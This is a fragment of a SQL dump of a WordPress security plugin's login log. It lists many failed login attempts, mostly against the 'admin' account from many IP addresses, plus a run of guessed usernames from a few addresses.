(101360, 1497685100.671789, 1, 'loginFailValidUsername', 'admin', 1, 3585148073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101359, 1497685099.614603, 1, 'loginFailValidUsername', 'admin', 1, 3585148073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101358, 1497685035.479205, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101357, 1497684857.394276, 1, 'loginFailValidUsername', 'admin', 1, 3154288046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101356, 1497684046.269408, 1, 'loginFailValidUsername', 'admin', 1, 1742476650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101355, 1497684045.054885, 1, 'loginFailValidUsername', 'admin', 1, 1742476650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101354, 1497681893.950254, 1, 'loginFailValidUsername', 'admin', 1, 2083059268, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101353, 1497681892.718963, 1, 'loginFailValidUsername', 'admin', 1, 2083059268, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101352, 1497681773.177427, 1, 'loginFailValidUsername', 'admin', 1, 3070050096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101351, 1497681771.494759, 1, 'loginFailValidUsername', 'admin', 1, 3070050096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101350, 1497680221.301512, 1, 'loginFailValidUsername', 'admin', 1, 699849360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101349, 1497680219.860836, 1, 'loginFailValidUsername', 'admin', 1, 699849360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101348, 1497677735.633797, 1, 'loginFailValidUsername', 'admin', 1, 2875375532, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101347, 1497677497.285854, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101346, 1497677119.346923, 1, 'loginFailValidUsername', 'admin', 1, 1442374564, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(101345, 1497675393.986842, 1, 'loginFailValidUsername', 'admin', 1, 831611257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101344, 1497675392.292607, 1, 'loginFailValidUsername', 'admin', 1, 831611257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101343, 1497670401.221443, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101342, 1497670352.648754, 1, 'loginFailValidUsername', 'admin', 1, 3000776981, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101341, 1497670351.529404, 1, 'loginFailValidUsername', 'admin', 1, 3000776981, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101340, 1497670087.122697, 1, 'loginFailValidUsername', 'admin', 1, 3319654464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101339, 1497670085.352933, 1, 'loginFailValidUsername', 'admin', 1, 3319654464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101338, 1497664078.909037, 1, 'loginFailValidUsername', 'admin', 1, 995899164, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101337, 1497664077.519015, 1, 'loginFailValidUsername', 'admin', 1, 995899164, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101336, 1497663144.836786, 1, 'loginFailValidUsername', 'admin', 1, 3305257452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101335, 1497663143.819460, 1, 'loginFailValidUsername', 'admin', 1, 3305257452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101334, 1497663116.583273, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101333, 1497663112.564796, 1, 'loginFailValidUsername', 'admin', 1, 3532827868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101332, 1497662926.781664, 1, 'loginFailValidUsername', 'admin', 1, 3358968011, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101331, 1497662925.379254, 1, 'loginFailValidUsername', 'admin', 1, 3358968011, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101330, 1497662623.072451, 1, 'loginFailValidUsername', 'admin', 1, 3032436716, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101329, 1497659507.889427, 1, 'loginFailValidUsername', 'admin', 1, 694709661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101328, 1497659506.470700, 1, 'loginFailValidUsername', 'admin', 1, 694709661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101327, 1497658504.204957, 1, 'loginFailValidUsername', 'admin', 1, 3372672787, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101326, 1497658502.528883, 1, 'loginFailValidUsername', 'admin', 1, 3372672787, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101325, 1497657067.203366, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101324, 1497656696.080354, 1, 'loginFailValidUsername', 'admin', 1, 1517874559, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101323, 1497656486.753677, 1, 'loginFailValidUsername', 'admin', 1, 3399919026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101322, 1497656484.493833, 1, 'loginFailValidUsername', 'admin', 1, 3399919026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101321, 1497656260.038023, 1, 'loginFailValidUsername', 'admin', 1, 1439252880, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101320, 1497654283.727939, 1, 'loginFailValidUsername', 'admin', 1, 2390016979, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101319, 1497654282.600555, 1, 'loginFailValidUsername', 'admin', 1, 2390016979, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101318, 1497651458.793766, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101317, 1497651320.408650, 1, 'loginFailValidUsername', 'admin', 1, 1742915821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101316, 1497651319.161453, 1, 'loginFailValidUsername', 'admin', 1, 1742915821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101315, 1497651090.812507, 1, 'loginFailValidUsername', 'admin', 1, 1539318777, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101314, 1497651089.789373, 1, 'loginFailValidUsername', 'admin', 1, 1539318777, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101313, 1497648465.757212, 1, 'loginFailValidUsername', 'admin', 1, 1892747498, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101312, 1497647740.720158, 1, 'loginFailValidUsername', 'admin', 1, 1976107644, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101311, 1497647738.330519, 1, 'loginFailValidUsername', 'admin', 1, 1976107644, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101310, 1497646941.827389, 1, 'loginFailValidUsername', 'admin', 1, 1568068015, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101309, 1497646940.808524, 1, 'loginFailValidUsername', 'admin', 1, 1568068015, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101308, 1497644335.689581, 1, 'loginFailValidUsername', 'admin', 1, 3373557666, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101307, 1497644326.623379, 1, 'loginFailValidUsername', 'admin', 1, 3373557666, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101306, 1497644065.985831, 1, 'loginFailValidUsername', 'admin', 1, 1391023253, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101305, 1497644065.082084, 1, 'loginFailValidUsername', 'admin', 1, 1391023253, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101304, 1497643675.131851, 1, 'loginFailValidUsername', 'admin', 1, 657483828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101303, 1497643673.555346, 1, 'loginFailValidUsername', 'admin', 1, 657483828, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101302, 1497640048.140562, 1, 'loginFailValidUsername', 'admin', 1, 3132885100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101301, 1497640045.002112, 1, 'loginFailValidUsername', 'admin', 1, 3132885100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101300, 1497638425.525701, 1, 'loginFailValidUsername', 'admin', 1, 1416458501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101299, 1497638424.444764, 1, 'loginFailValidUsername', 'admin', 1, 1416458501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101298, 1497637109.148622, 1, 'loginFailValidUsername', 'admin', 1, 778264191, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101297, 1497637108.167585, 1, 'loginFailValidUsername', 'admin', 1, 778264191, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101296, 1497636753.840860, 1, 'loginFailValidUsername', 'admin', 1, 1562720498, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101295, 1497636752.865306, 1, 'loginFailValidUsername', 'admin', 1, 1562720498, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101294, 1497634230.538174, 1, 'loginFailValidUsername', 'admin', 1, 1333917890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101293, 1497634229.463666, 1, 'loginFailValidUsername', 'admin', 1, 1333917890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101292, 1497633295.703369, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101291, 1497633038.706508, 1, 'loginFailValidUsername', 'admin', 1, 3065501688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101290, 1497633037.008418, 1, 'loginFailValidUsername', 'admin', 1, 3065501688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101289, 1497632322.764317, 1, 'loginFailValidUsername', 'admin', 1, 3389598256, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101288, 1497632321.376899, 1, 'loginFailValidUsername', 'admin', 1, 3389598256, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101287, 1497629656.828776, 1, 'loginFailValidUsername', 'admin', 1, 762807321, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101286, 1497629655.585200, 1, 'loginFailValidUsername', 'admin', 1, 762807321, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101285, 1497625981.008136, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101284, 1497620115.601845, 1, 'loginFailValidUsername', 'admin', 1, 2660020164, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101283, 1497620114.008868, 1, 'loginFailValidUsername', 'admin', 1, 2660020164, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101282, 1497618067.866352, 1, 'loginFailValidUsername', 'admin', 1, 3111507721, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; .NET4.0C)'),
(101281, 1497617885.440669, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101280, 1497610745.054482, 1, 'loginFailValidUsername', 'admin', 1, 1332036734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101279, 1497610744.087001, 1, 'loginFailValidUsername', 'admin', 1, 1332036734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101278, 1497610649.195363, 1, 'loginFailValidUsername', 'admin', 1, 2192896078, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101277, 1497610219.278669, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101276, 1497602806.844579, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101275, 1497599574.640353, 1, 'loginFailValidUsername', 'admin', 1, 1476942175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101274, 1497595291.622070, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101273, 1497594275.524027, 1, 'loginFailValidUsername', 'admin', 1, 2588096105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101272, 1497594273.695283, 1, 'loginFailValidUsername', 'admin', 1, 2588096105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101271, 1497594006.022743, 1, 'loginFailValidUsername', 'admin', 1, 2083198645, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101270, 1497594004.537238, 1, 'loginFailValidUsername', 'admin', 1, 2083198645, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101269, 1497588652.526115, 1, 'loginFailValidUsername', 'admin', 1, 2054111803, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101268, 1497588650.984761, 1, 'loginFailValidUsername', 'admin', 1, 2054111803, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101267, 1497588364.424451, 1, 'loginFailValidUsername', 'admin', 1, 2050666736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101266, 1497588100.009781, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101265, 1497587221.927679, 1, 'loginFailValidUsername', 'admin', 1, 1416429771, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101264, 1497587220.877607, 1, 'loginFailValidUsername', 'admin', 1, 1416429771, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101263, 1497582986.228470, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.18.61 (KHTML, like Gecko) Version/4.7.2 Safari/533.35'),
(101262, 1497581303.850928, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101261, 1497578872.187043, 1, 'loginFailValidUsername', 'admin', 1, 1768366811, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101260, 1497578870.884191, 1, 'loginFailValidUsername', 'admin', 1, 1768366811, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101259, 1497574414.667611, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101258, 1497572490.482926, 1, 'loginFailValidUsername', 'admin', 1, 1892867061, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101257, 1497570680.450906, 1, 'loginFailInvalidUsername', 'vous', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101256, 1497570678.604097, 1, 'loginFailValidUsername', 'pablo', 3, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101255, 1497570676.896491, 1, 'loginFailValidUsername', 'julie', 2, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(101254, 1497570675.204654, 1, 'loginFailInvalidUsername', 'center', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101253, 1497570673.545143, 1, 'loginFailInvalidUsername', 'namur', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101252, 1497570671.848297, 1, 'loginFailInvalidUsername', 'travail', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101251, 1497570670.148879, 1, 'loginFailInvalidUsername', 'professionnel', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101250, 1497570668.469985, 1, 'loginFailInvalidUsername', 'outils', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101249, 1497570666.753461, 1, 'loginFailInvalidUsername', 'venez', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101248, 1497570665.066864, 1, 'loginFailInvalidUsername', 'objectifs', 0, 872399819, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101247, 1497570069.971094, 1, 'loginFailInvalidUsername', 'cross', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101246, 1497570067.886494, 1, 'loginFailInvalidUsername', 'pour', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101245, 1497570065.782966, 1, 'loginFailInvalidUsername', 'notre', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101244, 1497570063.481352, 1, 'loginFailInvalidUsername', 'training', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101243, 1497570061.385954, 1, 'loginFailInvalidUsername', 'vous', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101242, 1497570059.289804, 1, 'loginFailValidUsername', 'pablo', 3, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101241, 1497570057.208941, 1, 'loginFailValidUsername', 'julie', 2, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101240, 1497570055.082494, 1, 'loginFailInvalidUsername', 'center', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101239, 1497570052.955899, 1, 'loginFailInvalidUsername', 'namur', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101238, 1497570050.858398, 1, 'loginFailInvalidUsername', 'travail', 0, 3098024864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(101237, 1497570048.954826, 1, 'loginFailValidUsername', 'admin', 1, 3583324972, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101236, 1497569315.054321, 1, 'loginFailValidUsername', 'admin', 1, 1730727519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101235, 1497569312.595843, 1, 'loginFailValidUsername', 'admin', 1, 1730727519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101234, 1497568645.021080, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101233, 1497568540.480428, 1, 'loginFailValidUsername', 'admin', 1, 532244500, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; InfoPath.2)'),
(101232, 1497563168.192785, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101231, 1497560317.736809, 1, 'loginFailValidUsername', 'admin', 1, 1602769142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101230, 1497560316.736366, 1, 'loginFailValidUsername', 'admin', 1, 1602769142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101229, 1497557687.252093, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101228, 1497556706.105200, 1, 'loginFailValidUsername', 'admin', 1, 1309966181, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101227, 1497556705.159186, 1, 'loginFailValidUsername', 'admin', 1, 1309966181, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101226, 1497556457.105505, 1, 'loginFailValidUsername', 'admin', 1, 1486676647, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101225, 1497556456.083607, 1, 'loginFailValidUsername', 'admin', 1, 1486676647, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101224, 1497555937.364954, 1, 'loginFailValidUsername', 'admin', 1, 831675222, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101223, 1497555935.809061, 1, 'loginFailValidUsername', 'admin', 1, 831675222, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101222, 1497555596.888769, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.06.59 (KHTML, like Gecko) Version/5.6.1 Safari/532.13'),
(101221, 1497554020.672054, 1, 'loginFailValidUsername', 'admin', 1, 693797103, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101220, 1497554019.418258, 1, 'loginFailValidUsername', 'admin', 1, 693797103, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101219, 1497551870.407807, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101218, 1497551181.852648, 1, 'loginFailValidUsername', 'admin', 1, 2996915206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101217, 1497548374.433040, 1, 'loginFailValidUsername', 'admin', 1, 1454326002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101216, 1497548373.191266, 1, 'loginFailValidUsername', 'admin', 1, 1454326002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
